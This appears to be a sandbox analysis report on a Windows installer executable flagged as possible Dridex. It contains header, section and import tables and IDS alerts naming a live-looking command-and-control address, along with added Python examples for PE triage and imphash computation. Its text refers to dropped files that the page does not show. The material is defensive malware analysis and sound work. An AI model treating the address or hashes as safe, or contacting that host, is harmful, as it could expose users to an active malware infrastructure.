                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.997820737228061
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          File name:Hbq580QZAR.exe
                                                                                          File size:3'445'716 bytes
                                                                                          MD5:015bce2662bf644e819a99d3d2b0548b
                                                                                          SHA1:cb27cb5da28a774e5590324b6062fc5953c09033
                                                                                          SHA256:d9ff5271da8e7ad2da78a2da803f4c2faed7c13da15700ce27547dc7c6529644
                                                                                          SHA512:d54fa4b0a1264f51043b1c0fb1c49f92ea0a60ef332b469d177229f86f0181f84ca5d31993e1ce6f6fba76c41cb59150055961c3540cf290abfcf989b8a2c039
                                                                                          SSDEEP:98304:MDp9KSy1XmbFzLZifsaApwGoA/OdH+n1rELwX2:bSc2bpIfsaApw3A8S1Qi2
                                                                                          TLSH:0EF53312C2CACB34CC5DB675CDAF97209F727B6114A6924CF20B847F6F62DC256182DA
                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                          Entrypoint:0x40a5f8
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (fixed Borland/Delphi linker constant stamped into every Delphi-built binary, consistent with the MZP stub and Inno Setup TrID hit above; not a build date and not usable for timelining)
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:1
                                                                                          OS Version Minor:0
                                                                                          File Version Major:1
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:1
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
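The dropped-file entries and the static info block above are the fields an analyst re-derives first when triaging a sample offline: hashes, 8-bit entropy, and the PE header values (entrypoint, image base, section table, file characteristics, link timestamp). The script below is an added example written for this page, not Joe Sandbox code and not derived from the sample's bytes. It parses a PE32 header the way the report does, decodes the characteristics flags, resolves the entrypoint to its section, and flags the 0x2A425E19 Borland/Delphi constant so the timestamp is not mistaken for a build date. Because the real file is not on this page, `build_sample_pe()` constructs a stand-in header modelled on the values shown (MZP stub, eight Delphi sections, entrypoint 0x40a5f8, characteristics 0x818F); its section sizes and linker version are assumptions chosen for illustration.

```python
"""Offline triage of a dropped PE32: hashes, entropy, header fields, timestamp sanity.

Added example; the sample PE it builds is a constructed stand-in, not the report's file.
"""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_CHARACTERISTICS bits (the subset needed to decode 0x818F and common DLL flags).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
# Link timestamps that are fixed constants rather than build times.
KNOWN_CONSTANT_TIMESTAMPS = {0x2A425E19: "Borland/Delphi linker constant (1992-06-19 22:22:17 UTC)"}

COFF_FMT = "<HHIIIHH"                                   # 20 bytes
OPT_HDR_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6   # PE32 standard + windows fields
SECTION_FMT = "<8sIIIIIIHHI"                            # 40 bytes
assert struct.calcsize(OPT_HDR_FMT) == 96 and struct.calcsize(SECTION_FMT) == 40


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes; ~7.9+ suggests packing."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def describe_timestamp(ts: int) -> str:
    if ts in KNOWN_CONSTANT_TIMESTAMPS:
        return KNOWN_CONSTANT_TIMESTAMPS[ts]
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_pe32(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, coff)
    opt = coff + 20
    f = struct.unpack_from(OPT_HDR_FMT, data, opt)
    if f[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) handled; got 0x%x" % f[0])
    entry_rva, image_base, subsystem, dll_chars = f[6], f[9], f[22], f[23]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr, "chars": sc})
    # Entrypoint lives in the section whose virtual range covers the RVA (report: "CODE").
    ep_section = next((s["name"] for s in sections
                       if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    return {
        "machine": machine, "timestamp": ts, "timestamp_note": describe_timestamp(ts),
        "characteristics": [n for bit, n in sorted(FILE_CHARACTERISTICS.items()) if chars & bit],
        "entrypoint": image_base + entry_rva, "entrypoint_section": ep_section,
        "image_base": image_base, "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "tsaware": bool(dll_chars & 0x8000), "sections": sections,
    }


def triage(data: bytes) -> dict:
    """Combine header parse with the whole-file measurements the report lists per dropped file."""
    r = parse_pe32(data)
    r["hashes"] = file_hashes(data)
    r["entropy"] = round(shannon_entropy(data), 4)
    r["flags"] = []
    if r["timestamp"] in KNOWN_CONSTANT_TIMESTAMPS:
        r["flags"].append("link timestamp is a known constant; do not use it as a build date")
    if r["entropy"] > 7.5:
        r["flags"].append("high entropy: packed or compressed payload likely")
    return r


def build_sample_pe() -> bytes:
    """Constructed stand-in modelled on the report's static info (assumed sizes; not the real file)."""
    dos = bytearray(0x80)
    dos[0:3] = b"MZP"                                  # Delphi-style DOS stub signature
    struct.pack_into("<I", dos, 0x3C, 0x80)            # e_lfanew
    coff = struct.pack(COFF_FMT, 0x14C, 8, 0x2A425E19, 0, 0, 0xE0, 0x818F)
    opt = struct.pack(OPT_HDR_FMT,
                      0x10B, 2, 25,                    # PE32 magic, assumed linker 2.25
                      0x9000, 0x3000, 0x1000,          # code / init / uninit sizes (assumed)
                      0xA5F8, 0x1000, 0xB000,          # entry RVA, base of code, base of data
                      0x400000, 0x1000, 0x200,         # image base, section align, file align
                      1, 0, 1, 0, 1, 0,                # OS / image / subsystem versions
                      0, 0x20000, 0x400, 0,            # Win32 version, SizeOfImage, SizeOfHeaders, checksum
                      2, 0x8000,                       # GUI subsystem, TERMINAL_SERVER_AWARE
                      0x100000, 0x4000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # 16 empty data directories
    sections, va, raw = b"", 0x1000, 0x400
    for n in [b"CODE", b"DATA", b"BSS", b".idata", b".tls", b".rdata", b".reloc", b".rsrc"]:
        size = 0xA000 if n == b"CODE" else 0x1000
        sections += struct.pack(SECTION_FMT, n, size, va, size, raw, 0, 0, 0, 0, 0x60000020)
        va += size
        raw += size
    return bytes(dos) + b"PE\0\0" + coff + opt + sections


if __name__ == "__main__":
    for k, v in triage(build_sample_pe()).items():
        if k != "sections":
            print(f"{k}: {v}")
```

Run against a real dropped file with `triage(open(path, "rb").read())`; the PE32+ console binary in the list above (machine 0x8664, magic 0x20b) would need the PE32+ optional-header layout, which this parser deliberately rejects rather than misreads.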
                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          add esp, FFFFFFC4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor eax, eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          mov dword ptr [ebp-24h], eax
                                                                                          call 00007F5204B1CEA3h
                                                                                          call 00007F5204B1E0AAh
                                                                                          call 00007F5204B1E339h
                                                                                          call 00007F5204B1E3DCh
                                                                                          call 00007F5204B2037Bh
                                                                                          call 00007F5204B22CE6h
                                                                                          call 00007F5204B22E4Dh
                                                                                          xor eax, eax
                                                                                          push ebp
                                                                                          push 0040ACC9h
                                                                                          push dword ptr fs:[eax]
                                                                                          mov dword ptr fs:[eax], esp
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC92h
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          mov eax, dword ptr [0040C014h]
                                                                                          call 00007F5204B238FBh
                                                                                          call 00007F5204B234E6h
                                                                                          cmp byte ptr [0040B234h], 00000000h
                                                                                          je 00007F5204B243DEh
                                                                                          call 00007F5204B239F8h
                                                                                          xor eax, eax
                                                                                          call 00007F5204B1DB99h
                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                          xor eax, eax
                                                                                          call 00007F5204B2098Bh
                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                          mov eax, 0040CE28h
                                                                                          call 00007F5204B1CF3Ah
                                                                                          push 00000002h
                                                                                          push 00000000h
                                                                                          push 00000001h
                                                                                          mov ecx, dword ptr [0040CE28h]
                                                                                          mov dl, 01h
                                                                                          mov eax, 0040738Ch
                                                                                          call 00007F5204B2121Ah
                                                                                          mov dword ptr [0040CE2Ch], eax
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC4Ah
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          call 00007F5204B23956h
                                                                                          mov dword ptr [0040CE34h], eax
                                                                                          mov eax, dword ptr [0040CE34h]
                                                                                          cmp dword ptr [eax+0Ch], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9d30 | 0x9e00 | c3bd95c4b1a8e5199981e0d9b45fd18c | False | 0.6052709651898734 | data | 6.631765876950794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x250 | 0x400 | 1ee71d84f1c77af85f1f5c278f880572 | False | 0.306640625 | data | 2.751820662285145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe8c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 8c81afd5cbdc70425e7ea3c4e3d7b3cb | False | 0.32572798295454547 | data | 4.493196889564934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
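The two tables above are what a PE parser derives from the 40-byte IMAGE_SECTION_HEADER records: the data-directory "Is in Section" column is a lookup of each directory RVA against the section ranges, and the per-section row carries the raw-versus-virtual size comparison and an entropy figure. The following is an added example, not Joe Sandbox code. REPORT_SECTIONS is constructed from the section table as listed (names, RVAs, sizes and characteristics flags); the raw file offsets that build_section_table() assigns are placeholders rather than the sample's, and the entropy helper is exercised on synthetic bytes, so its output is not the report's entropy column.

```python
"""Parse raw IMAGE_SECTION_HEADER entries and derive the per-section facts a
sandbox report tabulates: the section that holds a data-directory RVA, sections
with no bytes on disk, writable+executable sections, and Shannon entropy.

Added example, not Joe Sandbox code. REPORT_SECTIONS is constructed from the
section table in the report; raw file offsets below are placeholders.
"""
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER (winnt.h): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics  -> 40 bytes
SECTION_HEADER = struct.Struct("<8s6I2HI")

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
_R, _W, _X = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE
_CODE, _IDATA, _SHR = IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED

# (Name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics) as listed in the report
REPORT_SECTIONS = [
    ("CODE",   0x01000, 0x9d30, 0x9e00, _CODE | _X | _R),
    ("DATA",   0x0b000, 0x0250, 0x0400, _IDATA | _R | _W),
    ("BSS",    0x0c000, 0x0e8c, 0x0000, _R | _W),
    (".idata", 0x0d000, 0x0950, 0x0a00, _IDATA | _R | _W),
    (".tls",   0x0e000, 0x0008, 0x0000, _R | _W),
    (".rdata", 0x0f000, 0x0018, 0x0200, _IDATA | _SHR | _R),
    (".reloc", 0x10000, 0x08c4, 0x0000, _IDATA | _SHR | _R),
    (".rsrc",  0x11000, 0x2c00, 0x2c00, _IDATA | _SHR | _R),
]


def build_section_table(rows, first_raw_offset=0x400):
    """Serialise rows into consecutive IMAGE_SECTION_HEADER records (constructed input)."""
    blob, raw_ptr = bytearray(), first_raw_offset
    for name, va, vsize, raw_size, chars in rows:
        blob += SECTION_HEADER.pack(name.encode("ascii").ljust(8, b"\0"), vsize, va, raw_size,
                                    raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        raw_ptr += raw_size
    return bytes(blob)


def parse_section_table(blob, count):
    """Decode `count` section headers starting at offset 0 of blob."""
    sections = []
    for i in range(count):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = SECTION_HEADER.unpack_from(
            blob, i * SECTION_HEADER.size)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
                         "raw_pointer": raw_ptr, "characteristics": chars})
    return sections


def section_for_rva(sections, rva):
    """Reproduce the data-directory table's 'Is in Section' column.
    The loader maps each section over max(VirtualSize, SizeOfRawData) bytes from
    VirtualAddress (section-alignment rounding is ignored here)."""
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return s["name"]
    return None


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes.
    Packed or encrypted code typically sits above about 7."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_findings(sections):
    """Flags a triage analyst reads straight off the section table."""
    findings = []
    for s in sections:
        ch = s["characteristics"]
        if ch & IMAGE_SCN_MEM_EXECUTE and ch & IMAGE_SCN_MEM_WRITE:
            findings.append((s["name"], "writable and executable"))
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append((s["name"], "no bytes on disk; zero-filled at load and written at runtime"))
    return findings


if __name__ == "__main__":
    secs = parse_section_table(build_section_table(REPORT_SECTIONS), len(REPORT_SECTIONS))
    for s in secs:
        print(f"{s['name']:<8} va=0x{s['virtual_address']:05x} vsize=0x{s['virtual_size']:04x} "
              f"raw=0x{s['raw_size']:04x}")
    for rva in (0xd000, 0xf000, 0x11000):
        print(f"RVA 0x{rva:x} is in {section_for_rva(secs, rva)}")
    print(section_findings(secs))
    print(f"uniform bytes: {shannon_entropy(bytes(range(256))):.2f} bits/byte")
```

Run against the constructed table, section_for_rva() returns .idata, .rdata and .rsrc for the import, TLS and resource directory RVAs, matching the "Is in Section" column, and section_findings() names BSS, .tls and .reloc as the sections that exist only in memory. To apply it to a real file, read the headers at `e_lfanew + 24 + SizeOfOptionalHeader` and pass `NumberOfSections`.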
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | - | - | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | - | - | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | - | - | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | - | - | 0.75
RT_STRING | 0x12eac | 0xb4 | data | - | - | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | - | - | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | - | - | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.2610410094637224
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
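The Import Hash given in the header block is only useful as a pivot if the tool you compare against computes it the same way. The following is an added example, not Joe Sandbox or pefile code: it implements the algorithm of pefile's PE.get_imphash() (lowercase DLL name with a .dll/.ocx/.sys extension stripped, "dll.function" tokens in import-directory order, comma-joined, MD5). That the report's "Import Hash" is this imphash is an assumption, as is the ordering of the constructed REPORT_IMPORTS list, which is taken from the first import table above as printed. Ordinal-only imports, which pefile resolves through a per-DLL ordinal table and otherwise names "ordN", are not handled here, so the value printed is not guaranteed to equal the report's.

```python
"""Reference imphash computation over an import table given as
(dll, [function, ...]) pairs in import-directory order.

Added example, not Joe Sandbox or pefile code. REPORT_IMPORTS is constructed
from the first import table in the report, in the order listed.
"""
import hashlib

REPORT_IMPORTS = [
    ("kernel32.dll", ["DeleteCriticalSection", "LeaveCriticalSection", "EnterCriticalSection",
                      "InitializeCriticalSection", "VirtualFree", "VirtualAlloc", "LocalFree",
                      "LocalAlloc", "WideCharToMultiByte", "TlsSetValue", "TlsGetValue",
                      "MultiByteToWideChar", "GetModuleHandleA", "GetLastError", "GetCommandLineA",
                      "WriteFile", "SetFilePointer", "SetEndOfFile", "RtlUnwind", "ReadFile",
                      "RaiseException", "GetStdHandle", "GetFileSize", "GetSystemTime",
                      "GetFileType", "ExitProcess", "CreateFileA", "CloseHandle"]),
    ("user32.dll", ["MessageBoxA"]),
    ("oleaut32.dll", ["VariantChangeTypeEx", "VariantCopyInd", "VariantClear", "SysStringLen",
                      "SysAllocStringLen"]),
    ("advapi32.dll", ["RegQueryValueExA", "RegOpenKeyExA", "RegCloseKey", "OpenProcessToken",
                      "LookupPrivilegeValueA"]),
]


def imphash_string(import_table):
    """Build the pre-hash string: 'dll.function' tokens in table order, all lowercase,
    with a trailing .dll/.ocx/.sys stripped from the library name (other extensions stay)."""
    tokens = []
    for dll, functions in import_table:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        tokens.extend(f"{lib}.{fn.lower()}" for fn in functions)
    return ",".join(tokens)


def imphash(import_table):
    """MD5 of imphash_string(). Same imports in the same order give the same hash;
    reordering or adding a single import changes it completely."""
    return hashlib.md5(imphash_string(import_table).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash_string(REPORT_IMPORTS)[:80] + "...")
    print("imphash:", imphash(REPORT_IMPORTS))
```

Because the hash covers names and order but not counts of calls or where they are used, it clusters builds that share a linker and import layout rather than identifying a specific sample; treat a match as a lead to confirm with the section and resource data above, not as attribution on its own.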
Language of compilation system | Country where language is spoken
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T21:09:00.658716+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:01.486334+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:06.384113+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49711 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:07.101198+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:08.727603+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49712 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:09.462001+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:11.182430+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49714 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:11.888662+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49714 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:13.655094+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49715 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:14.348609+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:15.958266+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49716 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:16.668888+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49716 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:18.459472+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49718 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:19.162482+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49718 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:20.767558+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49724 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:21.528430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49724 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:23.091280+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49730 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:23.773716+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49730 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:25.363360+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49736 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:26.062372+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49736 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:27.664970+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49742 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:28.352868+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49742 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:29.948095+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49748 | 188.119.66.185 | 443 | TCP
